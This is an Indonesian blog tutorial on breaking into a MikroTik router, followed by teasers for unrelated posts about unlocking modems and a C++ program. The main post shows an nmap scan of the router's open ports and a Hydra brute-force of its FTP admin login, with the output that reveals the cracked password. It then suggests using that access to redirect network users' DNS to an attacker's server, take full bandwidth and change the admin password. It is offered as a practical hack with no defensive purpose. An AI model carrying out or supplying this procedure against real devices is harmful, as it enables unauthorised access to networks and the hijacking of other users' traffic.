Skip to main content

Cara Kerja Membobol Mikrotik

Hacking password Mikrotik secara langsung dengan memanfaatkan titik terlemah


Tidak ada sistem yang aman 100%, karena begitu banyak kemungkinan jika kita melihat dari berbagai sisi, sebelumnya penulis menulis artikel untuk hacking mikrotik dari sisi celah di telnet, tapi sebenarnya sama bahayanya dengan telnet yaitu FTP.
Percobaan penulis melakukan serangan BF (brute force) pada http, telnet dan ssh mengalami kegagalan, setelah termenung sekian lama ahkirnya penulis ingat serangan BF pada FTP di waktu sebelumnya, ahkirnya penulis mencoba melakukan BF pada FTP dan hasilnya ternyata bisa. Hmm username dan password untuk http, telnet, ssh, telnet adalah sama, satu celah kena maka semua kena, jadi? :)
Dari sisi kompatibilitas mikrotik dapat diancungi jempol tapi akibat dari banyaknya kompatibilitas yang ada dapat membawa ancaman lebih besar, seperti pada telnet yang penulis bahas dan praktek diartikel yang sebelumnya.
Oke, kita langsung praktek saja, kita periksa port yang terbuka di mikrotik
C:\Documents and Settings\serverdata>nmap -A 192.168.1.174
Starting Nmap 5.21 ( http://nmap.org ) at 2011-11-07 15:36 Pacific Standard Time
Nmap scan report for 192.168.1.174
Host is up (0.00013s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        MikroTik router ftpd 3.20
22/tcp   open  ssh        OpenSSH 2.3.0 mikrotik 2.9 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 1024 c6:5e:04:d3:12:db:1d:98:c9:17:e2:98:77:d4:39:ba (RSA1)
|_1024 76:68:bc:ee:e3:40:f5:6b:72:ea:44:55:df:86:06:ec (DSA)
23/tcp   open  telnet     Linux telnetd
80/tcp   open  http       MikroTik router http config
|_html-title: mikrotik routeros > administration
2000/tcp open  winbox     MikroTik WinBox management console
8080/tcp open  http-proxy Mikrotik http proxy
8291/tcp open  unknown
MAC Address: 08:00:27:22:84:F1 (Cadmus Computer Systems)
Device type: media device
Running: Chumby embedded
OS details: Chumby Internet radio
Network Distance: 1 hop
Service Info: OS: Linux; Device: router
HOP RTT     ADDRESS
1   0.13 ms 192.168.1.174
OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.00 seconds
Ternyata banyak port dan service yang terbuka di mikrotik. :D
Oke tidak perlu berpanjang-panjang lebar lagi, kita langsung hack saja mikrotik target.
C:\Documents and Settings\serverdata>
C:\hydra>hydra -l admin -P kamus.txt 192.168.1.174 ftp
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-11-07 14:39:20
[DATA] 16 tasks, 1 servers, 23 login tries (l:1/p:23), ~1 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.174   login: admin   password: jagoan
[STATUS] attack finished for 192.168.1.174 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2011-11-07 14:39:26
Binggo, password mikrotik sudah didapat, kita coba masuk lewat web.
Saat login dan exploitasi yang dapat dilakukan.
Menghajar para pengguna jaringan di mikrotik dengan mengarahkan DNS Servernya ke DNS Server milik kita, ya samalah tekniknya dengan teknik di artikel sebelumnya yang penulis tulis untuk poisoning DNS para pengguna yang menggunakan DHCP router. :D
Ingin dapat bandwidth full ? :D
Terbatas di web, pakai winbox saja dan login pakai pakai password yang kita hack dari FTP sebelumnya biar lebih banyak option lagi, jika ingin mengganti password router password mikrotik di winbox maka contohnya klik saja password dan muncul form input untuk password lama dan password baru.
Labels:

Comments

Post a Comment

Popular posts from this blog

UNLOCK MODEM BOLT BL500

Sejak 28 Desember 2018 layanan bolt resmi berhenti beroperasi. Kebetulan saya berlangganan produk Bolt Home yang saya pasang di kediaman orang tua saya di Depok. Karena itu pula saya membutuhkan alternatif koneksi Internet untuk mereka. Sialnya sampai saat ini saya belum menemukan koneksi alternatif karena daerah rumah mereka tidak dilewati leased line apapun kecuali IndiHome. Download : Firmware Bolt BL500 Tentu saja dengan limitasi, yaitu hanya dapat beroperasi di jaringan Smartfren saja, saya maklumi karena modem tersebut single band hanya berjalan di frekuensi 2300 MHz (FYI: Menurut Om Herry SW, Telkomsel juga menggunakan frekuensi 2300 MHz di beberapa lokasi di Jakarta ). Prosedur unlock Modem Helios G2 BL500 sendiri cukup mudah, yang kita perlukan hanya update firmware modem tersebut ke versi 00.00.96.999. Masalah berikutnya adalah bagaimana memberitahu mereka cara unlock-nya, biasanya jika ada masalah pada komputer mereka saya pakai TeamViewer , dalam kasus i...
Post a Comment
Read more

Program Rental Mobil Menggunakan C++

How are you sobat, saya harap sih sobat sekalian membaca artikel ini dengan keadaan sehat-sehat saja yah sobat amin, dan semoga kita juga selalu diberikan kesehatan maupun kemudahan bagi kita semua sobat oleh Allah SWT sang pencipta kita yang maha kuasa dan esa. Untuk kesekian kalinya sobat lagi- lagi saya kembali memposting tutorial ataupun coding dari bahasa pemrograman C++ sobat maklum sobat pemrograman terstruktur C++ ini sobat merupakan mata kuliah saya juga di semester 3 sobat. Adapun judul dari program yang mau saya posting ini sobat yaitu Program Sewa Mobil di C++  atau bisa juga disebut dengan program rental mobil dengan C++ sobat. Program Sewa Mobil di C++ ini sobat menggunakan pernyataan NESTED IF (if bersarang) sobat ataupun biasa lebih dikenal dengan penyataan If dalam If, misalnya saja sobat  jika pernyataan tersebut benar atau salah maka akan ada suatu pernyataan lagi dan jika setelah pernyataan itu terpenuhi masih ada pernyataan lagi maka akan dikerjakan...
Post a Comment
Read more

Mudah!! Cara Unlock Bolt MF90

Sahabat Blogger, pada kali ini gw akan membahas cara unlock bolt MF90 . Saya sudah mencobanya sendiri dengan firmware B07 dan terbukti 100% Work. Tidak usah berlama - lama langsung saja gw share step by stepnya. Sebelumnya Download dulu alat tempurnya, ADB Driver Update (Win 7 32 dan 64 bit) Unlock Bolt MF90 B07 dsp2.mbn Langkah Unlock Bolt MF90 B07 , Download dan Extract file-file diatas Buka Folder "Unlock Bolt MF90 B07" dan jalankan aplikasi " MF90 Unlocker.exe ". Install Driver ZTE dengan klik "Install Driver MF90" install seperti biasa. Buka Folder ADB Driver Update lalu Copy file " Fastboot.exe " ke C:\Program Files\ZTE LTE Datacard Product USB Driver". Copy file dsp2.mbn ke "C:\Program Files\ZTE LTE Datacard Product USB Driver". Hidupkan modem bolt kita, lalu sambungkan ke komputer/laptop kita. (Dengan masih terpasang kartu bolt / tanpa kartu saja). Jalankan debug dg copas ini di browser terus enter...
3 comments
Read more